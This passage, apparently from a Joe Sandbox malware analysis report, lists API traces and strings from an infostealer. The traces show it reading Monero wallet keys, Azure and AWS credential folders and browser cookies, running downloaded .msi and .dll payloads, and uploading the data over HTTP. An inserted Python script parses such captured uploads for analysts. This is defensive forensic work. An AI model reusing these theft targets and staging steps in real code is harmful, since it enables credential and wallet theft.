                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 006B5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6000
                                  • InternetCloseHandle.WININET(00000000), ref: 006B600D
                                  • HttpOpenRequestA.WININET(00000000,0147EAC8,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B5C48
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 76002406a03d2e1135e8029b1ade762ff41c781079b071caf58e7a68961f97e5
                                  • Instruction ID: 8784f656959d616e85a67ef5830dd1e841b1a2ae96740d2c71087e0e386809f1
                                  • Opcode Fuzzy Hash: 76002406a03d2e1135e8029b1ade762ff41c781079b071caf58e7a68961f97e5
                                  • Instruction Fuzzy Hash: 1912A472920118ABCB55EBE0DCA6FFEB37AEF14704F00459DB10666191EF706E48CB69
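Added example (Python, not from the report or the sample). The WinINet sequence traced above is InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with dwFlags 0x00400100, which decodes to INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE and notably does not include INTERNET_FLAG_SECURE, so the request travels in cleartext, then HttpSendRequestA and an InternetReadFile loop with a 0xC7 (199) byte buffer. The `"` and `------` strings concatenated into the request body next to those calls are consistent with the `name="..."`/`filename="..."` quoting and boundary lines of a multipart/form-data upload. The script decodes the flag value and parses a constructed capture of such a body back into the browser:/profile:/url:/login:/password: records, which is what an analyst does with the PCAP of a sandbox run. The trace does not settle whether `------` is the boundary parameter or the full delimiter line, the part names and the body are constructed for illustration, and the HTTP verb is not visible in the report; the parser therefore takes the boundary as an argument rather than hard-coding it.

```python
"""Added example, not code from the Joe Sandbox report or from the analysed sample."""
import re
from typing import Dict, List, Optional, Tuple

# Subset of wininet.h flag values, used to read HttpOpenRequestA's dwFlags argument.
WININET_FLAGS = [
    ("INTERNET_FLAG_RELOAD",           0x80000000),
    ("INTERNET_FLAG_SECURE",           0x00800000),
    ("INTERNET_FLAG_NO_CACHE_WRITE",   0x04000000),
    ("INTERNET_FLAG_KEEP_CONNECTION",  0x00400000),
    ("INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00200000),
    ("INTERNET_FLAG_NO_COOKIES",       0x00080000),
    ("INTERNET_FLAG_NO_UI",            0x00000200),
    ("INTERNET_FLAG_PRAGMA_NOCACHE",   0x00000100),
]


def decode_wininet_flags(flags: int) -> List[str]:
    """Names of the known flags set in an HttpOpenRequestA dwFlags value."""
    return [name for name, bit in WININET_FLAGS if flags & bit]


# Constructed capture. Boundary value and part names are illustrative; the report
# only shows the '"' and '------' literals being concatenated into the body.
BOUNDARY = b"------"
_DELIM = b"--" + BOUNDARY
SAMPLE_BODY = (
    _DELIM + b"\r\n"
    b'Content-Disposition: form-data; name="file_name"\r\n'
    b"\r\n"
    b"passwords.txt\r\n"
    + _DELIM + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"browser: FileZilla\nprofile: null\nurl: ftp.example.test:21\n"
    b"login: deploy\npassword: Sup3rS3cr3t\n"
    b"\r\n"
    + _DELIM + b"--\r\n"
)

_DISP = re.compile(rb"Content-Disposition:\s*form-data;(.*)", re.I)
_PARAM = re.compile(rb'(\w+)="([^"]*)"')


def _disposition(head: bytes) -> Tuple[Optional[str], Optional[str]]:
    """(name, filename) from the part headers, or (None, None) if absent."""
    for line in head.split(b"\r\n"):
        m = _DISP.match(line)
        if m:
            params = dict(_PARAM.findall(m.group(1)))
            name, fn = params.get(b"name"), params.get(b"filename")
            return (name.decode() if name else None, fn.decode() if fn else None)
    return (None, None)


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, Tuple[Optional[str], bytes]]:
    """RFC 7578 style split: name -> (filename, content). The CRLF that precedes
    each delimiter line belongs to the delimiter, not to the part content."""
    delim = b"--" + boundary
    parts: Dict[str, Tuple[Optional[str], bytes]] = {}
    for chunk in body.split(delim)[1:]:      # [0] is the preamble
        if chunk.startswith(b"--"):          # closing delimiter
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue
        if data.endswith(b"\r\n"):
            data = data[:-2]
        name, filename = _disposition(head)
        if name is not None:
            parts[name] = (filename, data)
    return parts


def records_from_payload(data: bytes) -> List[Dict[str, str]]:
    """Split a 'browser: ...' text payload into one dict per credential record;
    a new record starts at each 'browser:' line."""
    records: List[Dict[str, str]] = []
    for line in data.decode("utf-8", "replace").splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "browser":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


if __name__ == "__main__":
    print(decode_wininet_flags(0x00400100))
    parts = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print(records_from_payload(parts["file"][1]))
```

On a real capture, take the boundary from the Content-Type header of the request and feed the raw body bytes in; because INTERNET_FLAG_SECURE is not set, the body is directly readable from the PCAP without any TLS interception.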
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006BD1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006BD1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD308
                                  • lstrcat.KERNEL32(?,006D1570), ref: 006BD317
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD32A
                                  • lstrcat.KERNEL32(?,006D1574), ref: 006BD339
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD34C
                                  • lstrcat.KERNEL32(?,006D1578), ref: 006BD35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD36E
                                  • lstrcat.KERNEL32(?,006D157C), ref: 006BD37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD390
                                  • lstrcat.KERNEL32(?,006D1580), ref: 006BD39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD3B2
                                  • lstrcat.KERNEL32(?,006D1584), ref: 006BD3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD3D4
                                  • lstrcat.KERNEL32(?,006D1588), ref: 006BD3E3
                                    • Part of subcall function 006CAB30: lstrlen.KERNEL32(006B4F55,?,?,006B4F55,006D0DDF), ref: 006CAB3B
                                    • Part of subcall function 006CAB30: lstrcpy.KERNEL32(006D0DDF,00000000), ref: 006CAB95
                                  • lstrlen.KERNEL32(?), ref: 006BD42A
                                  • lstrlen.KERNEL32(?), ref: 006BD439
                                    • Part of subcall function 006CAD80: StrCmpCA.SHLWAPI(00000000,006D1568,006BD2A2,006D1568,00000000), ref: 006CAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BD4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: ccc31a01e1b68359da6d8fcc526229d989c0e634e6d08d52f74c1b12976ec929
                                  • Instruction ID: 3b12eb4b2c035e85998e3fdcb005348e495a60a0b1f6de7f7ccbbdd188bd0c71
                                  • Opcode Fuzzy Hash: ccc31a01e1b68359da6d8fcc526229d989c0e634e6d08d52f74c1b12976ec929
                                  • Instruction Fuzzy Hash: 7CE11A71924108ABCB44EBE0DD96EFEB33AEF14305F10455DF207661A1DE31AE48DB6A
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0147D1D0,00000000,?,006D1544,00000000,?,?), ref: 006BCB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006BCB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 006BCB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006BCBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 006BCBD9
                                  • StrStrA.SHLWAPI(?,0147D278,006D0B56), ref: 006BCBF7
                                  • StrStrA.SHLWAPI(00000000,0147D290), ref: 006BCC1E
                                  • StrStrA.SHLWAPI(?,0147DBC0,00000000,?,006D1550,00000000,?,00000000,00000000,?,01479228,00000000,?,006D154C,00000000,?), ref: 006BCDA2
                                  • StrStrA.SHLWAPI(00000000,0147DCA0), ref: 006BCDB9
                                    • Part of subcall function 006BC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006BC971
                                    • Part of subcall function 006BC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006BC97C
                                  • StrStrA.SHLWAPI(?,0147DCA0,00000000,?,006D1554,00000000,?,00000000,01479188), ref: 006BCE5A
                                  • StrStrA.SHLWAPI(00000000,01478F28), ref: 006BCE71
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B47), ref: 006BCA43
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B4B), ref: 006BCA57
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B4E), ref: 006BCA78
                                  • lstrlen.KERNEL32(00000000), ref: 006BCF44
                                  • CloseHandle.KERNEL32(00000000), ref: 006BCF9C
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 8c03534cf8033439d1b8fc2794721ab34511b2ed4f5cb47d551d3bf5b308a732
                                  • Instruction ID: 950650bbdced78415948ea379b46a847b20e05f78f62a224c1f8e48ee96fbb28
                                  • Opcode Fuzzy Hash: 8c03534cf8033439d1b8fc2794721ab34511b2ed4f5cb47d551d3bf5b308a732
                                  • Instruction Fuzzy Hash: 87E1C8B1914108ABCB54EBE4DCA6FFEB77AEF54304F00419DF10667191EB30AA49CB69
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0147B488,00000000,00020019,00000000,006D05BE), ref: 006C8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006C85B6
                                  • wsprintfA.USER32 ref: 006C85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006C860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8629
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: fccab8a225974172457b1228dcad96e7f05cfac4dd80a39ec164f1a48cc96e73
                                  • Instruction ID: 647f06bf266fa8de3726746c8c903d7760fbd31eacc4cbc59af378387810f0a2
                                  • Opcode Fuzzy Hash: fccab8a225974172457b1228dcad96e7f05cfac4dd80a39ec164f1a48cc96e73
                                  • Instruction Fuzzy Hash: 2A81F87191411CABDB64DB94CD95FEAB7B9FB48704F1082DDE209A6180DF70AE84CFA4
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006C91FC
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `dlF$`dlF$image/jpeg
                                  • API String ID: 2244384528-3363227958
                                  • Opcode ID: 925ef2d15fce99149c5af1b5dab2490b0d546dbcc02e64189022fc632647d482
                                  • Instruction ID: 1e075fbb6a20448f091a56de75f20c799a151b980dabdf5c9f866ec0c4bbffd6
                                  • Opcode Fuzzy Hash: 925ef2d15fce99149c5af1b5dab2490b0d546dbcc02e64189022fc632647d482
                                  • Instruction Fuzzy Hash: 4971BAB1A14208ABDB14DFE4DC99FEEB779EB48700F10850CF616AB290DB74E944DB64
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 006C501D
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4B7C
                                    • Part of subcall function 006C4B60: FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 006C50A9
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                    • Part of subcall function 006C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                    • Part of subcall function 006C4B60: FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006C5135
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4C00
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D08D3), ref: 006C4C15
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4C32
                                    • Part of subcall function 006C4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 006C4C6E
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,0147E988), ref: 006C4C9A
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,006D0FE0), ref: 006C4CAC
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,?), ref: 006C4CC0
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,006D0FE4), ref: 006C4CD2
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,?), ref: 006C4CE6
                                    • Part of subcall function 006C4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 006C4CFC
                                    • Part of subcall function 006C4B60: DeleteFileA.KERNEL32(?), ref: 006C4D81
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 42541623e2e5769b53d5c3a5235380d7fcfbf5e77602e953f21a1c9e9aeff641
                                  • Instruction ID: 096b3b98b46d3c1f5a13652de604926697350e565ece782b40257fe0fbd89d5c
                                  • Opcode Fuzzy Hash: 42541623e2e5769b53d5c3a5235380d7fcfbf5e77602e953f21a1c9e9aeff641
                                  • Instruction Fuzzy Hash: AA41E7BA94420877DB60F7A0EC97FED732A9B51704F00445C7245661C1EEF4ABC88B92
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C373A
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 42bdbe323909aa6e8d38355485a44786e172fad061703d882d07c9abd401230b
                                  • Instruction ID: 9bdf3e1cf5b25d97c146cfa250068f0be1fef8b087b8e0bd9cdb1f4e1410c2fa
                                  • Opcode Fuzzy Hash: 42bdbe323909aa6e8d38355485a44786e172fad061703d882d07c9abd401230b
                                  • Instruction Fuzzy Hash: 4E12F97191011C9ACB58EBE0DDA2FFDB73AEF14304F00459DE50666192EF346B49CB6A
                                  APIs
                                  • lstrcat.KERNEL32(?,cookies), ref: 006B9CAF
                                  • lstrcat.KERNEL32(?,006D12C4), ref: 006B9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 006B9CD5
                                  • lstrcat.KERNEL32(?,006D12C8), ref: 006B9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 006B9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 006B9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 006B9D17
                                  • lstrlen.KERNEL32(00000000), ref: 006B9D26
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1797936820-3542011879
                                  • Opcode ID: f52233e016da00e34ce0a645575b86e9fbe7c13628136e5e85ad820fd30dea67
                                  • Instruction ID: 772db98abe5f59173fe077d1dd741bb07ba62195c035f247b19402d80157adcc
                                  • Opcode Fuzzy Hash: f52233e016da00e34ce0a645575b86e9fbe7c13628136e5e85ad820fd30dea67
                                  • Instruction Fuzzy Hash: 88516CB2D10508ABDB14EBE0DC95FEEB339AF04301F404558F20AA7191EF75AA89CF65
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B62D0: InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                    • Part of subcall function 006B62D0: StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                    • Part of subcall function 006B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                    • Part of subcall function 006B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                    • Part of subcall function 006B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                    • Part of subcall function 006B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5568
                                  • lstrlen.KERNEL32(00000000), ref: 006C557F
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 006C55B4
                                  • lstrlen.KERNEL32(00000000), ref: 006C55D3
                                  • lstrlen.KERNEL32(00000000), ref: 006C55FE
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 554545886415db53d51efb191871aa24efe3d877579e23ad848104f3e4c9f74a
                                  • Instruction ID: 381ca6a1f309e5b5062863aea150079d48ffd8ec53276aaa44f2f82dc5fecfe7
                                  • Opcode Fuzzy Hash: 554545886415db53d51efb191871aa24efe3d877579e23ad848104f3e4c9f74a
                                  • Instruction Fuzzy Hash: C751C67091010CABCB54FFA0CDA6FFD773AEF11344F90445CE50A5A592EB30AA45DB6A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5814823e8682d754b2a34925609c48aafe3992dee021a152bbef09d0f4c84fac
                                  • Instruction ID: b71a81fa34e4580fcc61f39aa69f06dec180ce9a6756c1a6130042be3164888d
